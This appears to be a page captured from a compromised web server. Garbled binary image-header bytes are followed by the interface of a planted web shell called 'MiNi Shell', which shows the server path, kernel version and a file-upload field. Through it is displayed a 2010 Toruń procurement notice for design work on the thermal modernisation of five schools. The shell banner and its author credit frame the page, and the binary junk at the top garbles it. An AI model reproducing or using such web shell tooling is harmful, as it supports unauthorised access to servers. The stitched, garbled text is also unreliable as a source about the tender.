JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100223/51212-N-2010.html

<p class="kh_header"><b>Toruń: Wykonanie dokumentacji projektowych  Termomodernizacji obiektów oświatowych na terenie miasta Torunia 
dla obiektów:

1)	 Zespołu Szkół nr 16 przy ul. Dziewulskiego 2,   
2)	 Zespołu Szkół nr 28 przy ul. Przy Skarpie 13, 
3)	 Zespołu Szkół nr 1 przy ul. Wojska Polskiego 47a,   
4)	 Zespołu  Szkół Inżynierii Środowiska przy ul. Batorego 43/49, 
5)	Gimnazjum nr 21 przy ul. Morcinka 13</b><br>
<b>Numer ogłoszenia: 51212 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Toruń reprezentowana przez Prezydenta Miasta Torunia , ul. Wały gen. Sikorskiego 8, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6118713, faks 056 6118622.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> um.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowych  Termomodernizacji obiektów oświatowych na terenie miasta Torunia 
dla obiektów:

1)	 Zespołu Szkół nr 16 przy ul. Dziewulskiego 2,   
2)	 Zespołu Szkół nr 28 przy ul. Przy Skarpie 13, 
3)	 Zespołu Szkół nr 1 przy ul. Wojska Polskiego 47a,   
4)	 Zespołu  Szkół Inżynierii Środowiska przy ul. Batorego 43/49, 
5)	Gimnazjum nr 21 przy ul. Morcinka 13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie dokumentacji projektowych Termomodernizacji obiektów oświatowych na terenie miasta Torunia dla obiektów:
1)	Zespołu Szkół nr 16 przy ul. Dziewulskiego 2,
2)	Zespołu Szkół nr 28 przy ul. Przy Skarpie 13,
3)	Zespołu Szkół nr 1 przy ul. Wojska Polskiego 47a,
4)	Zespołu  Szkół Inżynierii Środowiska przy ul. Batorego 43/49,
5)	Gimnazjum nr 21 przy ul. Morcinka 13.

Materiałem wyjściowym do realizacji przedmiotu zamówienia są dokumentacje projektowe archiwalne dostępne u użytkowników poszczególnych obiektów. Ocena  przydatności tych dokumentacji  do dalszego wykorzystania należy do Wykonawcy. 

2.Zakres dokumentacji projektowej obejmuje:
1)	 Zespół Szkół nr 16 przy ul. Dziewulskiego 2:
-	docieplenie ścian zewnętrznych metodą lekką-mokrą (włącznie ze ścianami piwnic, w pomieszczeniach bez piwnic docieplenie 1 m poniżej poziomu terenu) wraz z wymianą świetlików oraz wymianą luksferów na okna, usunięciem płyt azbestowych  i blachy fałdowej,
-	docieplenie stropodachów wentylowanych (wraz z częściowym  kryciem papą zgrzewalną),
-	docieplenie stropodachów  niewentylowanych (wraz z kryciem papą zgrzewalną),
-	wymianę drewnianej stolarki okiennej wraz ze zmniejszeniem powierzchni okien           w  łącznikach  oraz  wymianę zewnętrznej stolarki drzwiowej (część jest wymieniona),
-	wymianę stalowej fasady okiennej w sali gimnastycznej na aluminiową wraz zmniejszeniem jej powierzchni oraz wymianę okien fasadowych w basenie,
-	wymianę lub naprawę instalacji odgromowej, wymianę krat na rolety,
-	modernizację wejść do budynku (daszki, schody, balustrady, podjazd dla niepełnosprawnych),
-	wykonanie nowej opaski wokół budynków wraz z odtworzeniem nawierzchni                 w sąsiedztwie obiektów,
-	modernizację systemu grzewczego: wewnętrzna instalacja centralnego ogrzewania          z  podziałem na obiegi grzewcze wraz z węzłami cieplnymi,
-	modernizację instalacji ciepłej wody wraz z cyrkulacją,
-	modernizację wentylacji mechanicznej wraz z automatyką AKŻ i basenu,
-	ustalenie nowej wartości mocy zamówionej dla dostawcy ciepła,
-	konieczność uzgodnienia modernizacji węzłów cieplnych z CERGIĄ.

2)	Zespół Szkół nr 28 przy ul. Przy Skarpie 13:
-	docieplenie ścian zewnętrznych metodą lekką-mokrą (włącznie ze ścianami piwnic, w pomieszczeniach bez piwnic docieplenie 1 m poniżej poziomu terenu) wraz z wymianą świetlików oraz wyminą luksferów na okna, usunięciem płyt azbestowych i blachy fałdowej, basen jest docieplony, należy tylko odnowić elewację,
-	docieplenie stropodachów wentylowanych,
-	wymianę drewnianej stolarki okiennej wraz ze zmniejszeniem powierzchni okien           w  łącznikach  oraz  wymianę zewnętrznej stolarki drzwiowej (znaczna część jest wymieniona),
-	wymianę stalowej fasady okiennej w sali gimnastycznej na aluminiową wraz zmniejszeniem  jej powierzchni,
-	wymianę lub naprawę instalacji odgromowej, wymianę krat na rolety,
-	modernizację wejść do budynku (daszki, schody, balustrady, podjazd dla niepełnosprawnych),
-	wykonanie nowej opaski wokół budynków wraz z odtworzeniem nawierzchni w sąsiedztwie  obiektów,
-	regulację instalacji c.o. wraz z węzłami cieplnymi,
-	modernizację instalacji ciepłej wody wraz z cyrkulacją, 
-	modernizację wentylacji mechanicznej  wraz z automatyką kuchni, AKŻ, sali gimnastycznej  i basenu,
-	ustalenie nowej wartości mocy zamówionej dla dostawcy ciepła, 
-	konieczność uzgodnienia modernizacji lub regulacji węzła cieplnego z CERGIĄ.

3)    Zespól Szkół nr 1 przy ul. Wojska Polskiego 47a:
-	docieplenie ścian zewnętrznych metodą lekką-mokrą (włącznie ze ścianami piwnic,  w  pomieszczeniach bez piwnic docieplenie 1 m poniżej poziomu terenu),
-	docieplenie stropodachów wentylowanych (wraz z dostosowaniem lub wymianą kratek     wentylacyjnych),
-	częściową wymianę drewnianej stolarki okiennej i zewnętrznej stolarki drzwiowej,
-	wymianę lub naprawę instalacji odgromowej, wymianę krat na rolety,
-	modernizację wejść do budynku (daszki, schody, balustrady, podjazd dla niepełnosprawnych),
-	wykonanie nowej opaski wokół budynków wraz z odtworzeniem nawierzchni                 w sąsiedztwie obiektów,
-	modernizację systemu grzewczego: wewnętrzna instalacja centralnego ogrzewania          z   podziałem na obiegi grzewcze wraz z węzłem cieplnym,
-	modernizację instalacji ciepłej wody wraz z cyrkulacją,
-	ustalenie nowej wartości mocy zamówionej dla dostawcy ciepła, 
-	konieczność uzgodnienia modernizacji węzła cieplnego z CERGIĄ.

4)   Zespół Szkół Inżynierii Środowiska przy ul. Batorego 43/49:
-	docieplenie ścian zewnętrznych metodą lekką-mokrą (włącznie ze ścianami piwnic, w pomieszczeniach bez piwnic docieplenie 1 m poniżej poziomu terenu) wraz z  niezbędną wymianą opierzeń blacharskich, rynien i rur spustowych w tym rur żeliwnych,
-	docieplenie stroropodachów wentylowanych (wraz z  wstawieniem kratek wentylacyjnych) bez budynku internatu,
-	docieplenie stropodachów  niewentylowanych (wraz z kryciem papą zgrzewalną),
-	wymianę zewnętrznej stolarki drzwiowej,
-	wymianę lub naprawę instalacji odgromowej, wymianę krat na rolety,
-	modernizację wejść do budynku (daszki, schody, balustrady),
-	wykonanie nowej opaski wokół budynków wraz z niezbędnym odtworzeniem nawierzchni w sąsiedztwie obiektów,
-	modernizację systemu grzewczego: wewnętrzna instalacja centralnego ogrzewania          z podziałem na obiegi grzewcze  (bez sali gimnastycznej),
-	modernizację instalacji ciepłej wody wraz z cyrkulacją, 
-	modernizację wentylacji kuchni i stołówki wraz z  automatyką, 
-	ustalenie nowej wartości mocy zamówionej dla dostawcy ciepła,
-	konieczność uzgodnienia modernizacji węzła cieplnego z CERGIĄ.

       5)   Gimnazjum nr 21 przy ul. Morcinka 13:
-	docieplenie ścian zewnętrznych metodą lekką-mokrą (włącznie ze ścianami piwnic,       w pomieszczeniach bez piwnic docieplenie 1 m poniżej poziomu terenu) wraz z  naprawą   podłoża oraz wymianą luksferów na okna,
-	docieplenie stropodachów wentylowanych (wraz z częściowym  kryciem papą zgrzewalną) oraz wstawienie kratek wentylacyjnych,
-	docieplenie stropodachów  niewentylowanych (wraz z kryciem papą zgrzewalną),
-	wymianę zewnętrznej stolarki drzwiowej oraz niewielką ilością okien, regulacją  istniejących okien wraz z wymianą uszczelek,
-	wymianę lub naprawę instalacji odgromowej, wymianę krat na rolety,
-	modernizację wejść do budynku (daszki wraz z ich pokryciem , schody, balustrady),
-	likwidację komina kotłowni,
-	wykonanie nowej opaski wokół budynków wraz z odtworzeniem nawierzchni w sąsiedztwie  obiektów,
-	wymianę rur deszczowych w części mieszkalnej, łączniku i sali gimnastycznej wraz       z   odcinkami kanalizacji deszczowej do najbliższych studni,
-	regulację instalacji c.o. wraz z węzłem cieplnym,
-	ustalenie nowej wartości mocy zamówionej dla dostawcy ciepła, 
-	konieczność uzgodnienia regulacji węzła cieplnego z CERGIĄ.

3.Dodatkowe założenia do realizacji przedmiotu zamówienia:  
-	opracowania  powinny zawierać obliczenia cieplne przegród obiektu oraz projektowaną charakterystykę energetyczną obiektu,
-	do wszystkich robót należy stosować materiały o dobrym standardzie,
-	wszystkie materiały przyjęte przez projektanta powinny mieć określone parametry, dotyczy to zarówno stolarki okiennej, papy zgrzewalnej jak i wszystkich materiałów stanowiących elementy warstw docieplających.

4.Wykaz opracowań wchodzących w skład przedmiotu zamówienia:
1)	Wielobranżowe projekty budowlane ze wszystkimi elementami projektów 
      wykonawczych, w tym:
-	Projekt termomodernizacji,
-	Projekt regulacji lub modernizacji instalacji c.o. i węzła cieplnego,
-	Projekt modernizacji wentylacji mechanicznej,
-	Projekt instalacji ciepłej wody wraz z cyrkulacją,
-	Projekt wymiany odcinka kanalizacji sanitarnej.
2)	Informacje dotyczące bezpieczeństwa i ochrony zdrowia,
3)	Specyfikacje techniczne wykonania i odbioru robót budowlanych ( wszystkie branże )+ wersja elektroniczna ( format pdf ),
4)	Kosztorysy inwestorskie + wersja elektroniczna (  format pdf  i ath ),
5)	Przedmiary robót  + wersja elektroniczna ( format pdf  i  ath),
6)	Zbiorcze zestawienie kosztów inwestycji, w tym:  wynikające z kosztorysów inwestorskich, kosztów wykonania dokumentacji projektowej, nadzorów inwestorskich i autorskich, wynikających z umów przyłączeniowych, wyposażenia i innych,
7)	Dokumentacja projektowa także  w wersji elektronicznej  w formacie pdf,
8)	Inne opracowania niezbędne do uzyskania pozwolenia na użytkowanie obiektu.
  
5.Przedmiot zamówienia obejmuje ponadto:
1)	wykonanie mapy syt.-wys. w skali 1:500,  
2)	wykonanie mapy stanu prawnego terenu objętego projektowaną inwestycją,  z aktualnymi   adresami właścicieli i władających nieruchomościami,  
3)	 w razie potrzeby uzyskanie warunków technicznych od właściwych instytucji eksploatujących sieci (na podstawie przygotowanych przez Wykonawcę stosownych wniosków do podpisu przez Zamawiającego),  
4)	przygotowanie dokumentów do wystąpienia o wymagane decyzje administracyjne, w tym decyzję o pozwoleniu na budowę  (przygotowane przez Wykonawcę stosowne wnioski z załącznikami do podpisu przez Zamawiającego),
5)	przeniesienie na Zamawiającego praw autorskich majątkowych do wykonanej dokumentacji projektowej w zakresie objętym umową..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających (art. 67 ust. 1 pkt. 6 PZP) stanowiących nie więcej niż 50% wartości zamówienia podstawowego i dotyczącego przedmiotu zamówienia-prac określonych w punkcie 1 siwz.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.22.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca zrealizował w ciągu ostatnich 3  lat przed upływem  terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej 2 usługi dotyczące  projektowania  obiektów  kubaturowych  o  wartości  każdego  projektu  min. 100 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli osoby, którymi dysponuje  Wykonawca i które będą uczestniczyć w wykonaniu zamówienia muszą posiadać uprawnienia budowlane do  projektowania  bez  ograniczeń  lub  w  ograniczonym  zakresie  we właściwych specjalnościach wydanych  na podstawie Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83, poz. 578) lub inne odpowiednie, wydane na podstawie wcześniej obowiązujących przepisów oraz przynależeć do właściwej izby samorządu zawodowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) oświadczenie, iż Wykonawca spełnia warunki określone w art. 22 ust. 1 prawa zamówień publicznych  
b) oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy 
c)oświadczenie Wykonawcy, które z informacji zawartych w ofercie na stronach od .... do .... stanowią
tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy zwalczaniu nieuczciwej konkurencji i jako
takie nie mogą być udostępniane innym uczestnikom postępowania.
Brak powyższego oświadczenia oznaczał będzie, że dokumenty składające się na ofertę nie stanowią tajemnicy przedsiębiorstwa (Wykonawca nie może zastrzec wszystkich dokumentów).
d) oświadczenie wykonawcy jaką cześć zamówienia zamierza powierzyć podwykonawcom (jeżeli wykonawca przewiduje wykonanie przedmiotu zamówienia przy udziale podwykonawców).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonanie zmian  umowy na  warunkach określonych poniżej:
1) jeżeli zmiana  umowy będzie korzystna dla Zamawiającego i w szczególności dotyczyć będzie:  
a)	zmiany zaprojektowanej technologii  wykonawstwa robót,
b)	zamiany materiałów przewidzianych do wykonania robót określonych w dokumentacji projektowej,
c)	innych nie wymienionych zmian korzystnych dla Zamawiającego,

2) jeżeli zmiana umowy dotyczyć będzie zmiany terminu wykonania przedmiotu  zamówienia           z przyczyn niezależnych od którejkolwiek ze stron,  które w szczególności dotyczyć będą:
a)	uwarunkowań formalno-prawnych, w szczególności dotyczących wprowadzenia zmian do dokumentacji projektowej na etapie projektowania zadania z przyczyn niezależnych od obu stron,

3) jeżeli zmiana umowy dotyczyć będzie konieczności wprowadzenia do zakresu przedmiotu umowy ewentualnych opracowań dodatkowych lub zamiennych, w szczególności wynikających z zaistniałych na etapie projektowania nieprzewidzianych uwarunkowań technicznych, formalno-prawnych,  których nie można było przewidzieć w  chwili zawarcia umowy,  z ewentualną korektą wynagrodzenia ustaloną na podstawie negocjacji stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Torunia - Wydział Inwestycji i Remontów, Toruń ul Wały Gen. Sikorskiego 10 (pokój nr 22)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2010 godzina 10:00, miejsce: Urząd Miasta Torunia - Wydział Inwestycji i Remontów, Toruń ul Wały Gen. Sikorskiego 10 (pokój nr 22)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com